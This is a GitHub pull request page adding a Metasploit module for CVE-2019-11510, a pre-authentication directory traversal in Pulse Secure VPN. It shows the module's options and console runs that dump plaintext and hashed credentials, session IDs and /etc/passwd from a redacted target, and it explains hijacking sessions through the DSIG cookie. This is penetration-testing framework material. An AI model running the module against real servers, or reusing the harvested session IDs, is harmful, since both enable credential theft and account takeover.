Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Pulse Secure VPN arbitrary file disclosure (redux) #12511

Merged
merged 16 commits into from Nov 12, 2019
Merged

Conversation

@wvu-r7
Copy link
Contributor

wvu-r7 commented Oct 30, 2019

WIP (delayed waiting on #12510 and #12517)

#12510 is merged, and #12517 is non-essential to moving this forward. We're lacking critical testing results to automate this to work with #12515, too. I had originally looped through the found SIDs, but it was inelegant and noisy. Using plaintext creds would have been nice.

This is a rewrite of #12220. Please see that ticket for relevant history.

This PR requires #12510 to avoid a ridiculously long timeout.

Information

msf5 auxiliary(gather/pulse_secure_file_disclosure) > info

       Name: Pulse Secure VPN Arbitrary File Disclosure
     Module: auxiliary/gather/pulse_secure_file_disclosure
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2019-04-24

Provided by:
  Orange Tsai
  Meh Chang
  Alyssa Herrera
  Justin Wagner
  wvu <wvu@metasploit.com>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Available actions:
  Name       Description
  ----       -----------
  Automatic  Dump creds and sessions
  Manual     Dump an arbitrary file (FILE option)

Check supported:
  No

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  FILE     /etc/passwd      yes       File to dump (manual mode only)
  PRINT    true             no        Print file contents (manual mode only)
  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    443              yes       The target port (TCP)
  SSL      true             no        Negotiate SSL/TLS for outgoing connections
  VHOST                     no        HTTP server virtual host

Description:
  This module exploits a pre-auth directory traversal in the Pulse
  Secure VPN server to dump an arbitrary file. Dumped files are stored
  in loot. If the "Automatic" action is set, plaintext and hashed
  credentials, as well as session IDs, will be dumped. Valid sessions
  can be hijacked by setting the "DSIG" browser cookie to a valid
  session ID. For the "Manual" action, please specify a file to dump
  via the "FILE" option. /etc/passwd will be dumped by default. If the
  "PRINT" option is set, file contents will be printed to the screen,
  with any unprintable characters replaced by a period. Please see
  related module exploit/linux/http/pulse_secure_cmd_exec for a
  post-auth exploit that can leverage the results from this module.

References:
  https://cvedetails.com/cve/CVE-2019-11510/
  https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
  https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
  https://hackerone.com/reports/591295

Related modules:
  exploit/linux/http/pulse_secure_cmd_exec

msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Automatic mode

msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in automatic mode
[*] Dumping /data/runtime/mtmp/lmdb/dataa/data.mdb
[+] /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
[*] Dumping /data/runtime/mtmp/lmdb/randomVal/data.mdb
[*] Parsing session IDs...
[+] Session ID found: df502e6052d9002d8f02160af8bfd055
[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
[+] Session ID found: acbef5625
[+] Session ID found: c145e683a
[+] Session ID found: fc6c097dd
[+] Session ID found: 249b470bd9bd1983f721ca950a74e61c
[+] Session ID found: c145e683a17cfacb72a47eb8b2515c14
[+] Session ID found: a7661751393e16fa253e97bd02dc2a4f
[+] Session ID found: 7e78ab276afea3f00dfa41892c437156c699eff8
[+] /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
[*] Dumping /data/runtime/mtmp/system
[+] /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) > loot

Loot
====

host         service  type                                        name                                        content                   info                   path
----         -------  ----                                        ----                                        -------                   ----                   ----
[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/dataa/data.mdb      application/octet-stream  Plaintext credentials  /Users/wvu/.msf4/loot/20191029221840_default_[redacted]_PulseSecureVPN_273470.mdb
[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/lmdb/randomVal/data.mdb  application/octet-stream  Session IDs            /Users/wvu/.msf4/loot/20191029221845_default_[redacted]_PulseSecureVPN_607925.mdb
[redacted]            Pulse Secure VPN Arbitrary File Disclosure  /data/runtime/mtmp/system                   application/octet-stream  Hashed credentials     /Users/wvu/.msf4/loot/20191029221851_default_[redacted]_PulseSecureVPN_530345.bin

msf5 auxiliary(gather/pulse_secure_file_disclosure) >

Manual mode

msf5 auxiliary(gather/pulse_secure_file_disclosure) > set action Manual
action => Manual
msf5 auxiliary(gather/pulse_secure_file_disclosure) > run
[*] Running module against [redacted]

[*] Running in manual mode
[*] Dumping /etc/passwd
root:x:0:0:root:/:/bin/bash
nfast:x:0:0:nfast:/:/bin/bash
bin:x:1:1:bin:/:
nobody:x:99:99:Nobody:/:
dns:x:98:98:DNS:/:
term:x:97:97:Telnet/SSH:/:
web80:x:96:96:Port 80 web:/:
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
postgres:x:102:102:PostgreSQL User:/:

[+] /Users/wvu/.msf4/loot/20191029222949_default_[redacted]_PulseSecureVPN_073170.bin
[*] Auxiliary module execution completed
msf5 auxiliary(gather/pulse_secure_file_disclosure) >
0xDezzy and others added 9 commits Aug 21, 2019
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
Co-Authored-By: bcoles <bcoles@gmail.com>
@wvu-r7 wvu-r7 removed the needs-docs label Oct 30, 2019
@wvu-r7 wvu-r7 changed the title [WIP] Redux of Pulse Secure VPN arbitrary file disclosure Redux of Pulse Secure VPN arbitrary file disclosure Oct 30, 2019
@wvu-r7 wvu-r7 removed the delayed label Oct 30, 2019
@wvu-r7 wvu-r7 changed the title Redux of Pulse Secure VPN arbitrary file disclosure Pulse Secure VPN arbitrary file disclosure (redux) Oct 30, 2019
@wvu-r7 wvu-r7 mentioned this pull request Oct 31, 2019
0 of 2 tasks complete
@wvu-r7 wvu-r7 changed the title Pulse Secure VPN arbitrary file disclosure (redux) [WIP] Pulse Secure VPN arbitrary file disclosure (redux) Oct 31, 2019
@wvu-r7 wvu-r7 added the delayed label Oct 31, 2019
@wvu-r7 wvu-r7 changed the title [WIP] Pulse Secure VPN arbitrary file disclosure (redux) Pulse Secure VPN arbitrary file disclosure (redux) Nov 12, 2019
@wvu-r7 wvu-r7 removed the delayed label Nov 12, 2019
wvu-r7 added a commit that referenced this pull request Nov 12, 2019
@wvu-r7 wvu-r7 merged commit 5235759 into rapid7:master Nov 12, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Nov 12, 2019
@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

wvu-r7 commented Nov 12, 2019

Release Notes

The pulse_secure_file_disclosure module has been added to the framework. It exploits a local file inclusion against Pulse Secure VPN servers, downloading credential data in automatic mode or an arbitrary file in manual mode.

@wvu-r7 wvu-r7 deleted the wvu-r7:pr/12220 branch Nov 12, 2019
@tdoan-r7 tdoan-r7 added the rn-modules label Dec 11, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.